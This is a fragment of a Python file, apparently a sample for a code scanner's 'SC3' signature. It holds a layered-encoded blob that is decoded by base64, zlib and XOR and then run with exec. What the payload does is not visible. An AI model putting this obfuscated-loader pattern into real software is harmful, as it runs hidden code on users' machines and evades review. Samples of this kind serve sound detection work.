YntVwu3J5htuK7u0gnoH3KNzq5j6/7Lf/a/r1v0aQTtnH3urRCXFz1BF1KmkSnFhNi/6f+TvRtTyvL4XtIw3hum+kPvz30beT4iV7/8geraooicI2hakyPRbAn+wv0PF0rbbZ/CYIJfINPW48YjnaYW+nlm4/UMqLnxsLvr98kdY1b"
_K = bytes.fromhex("4dee2d012d6d6ec3305ecad3")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
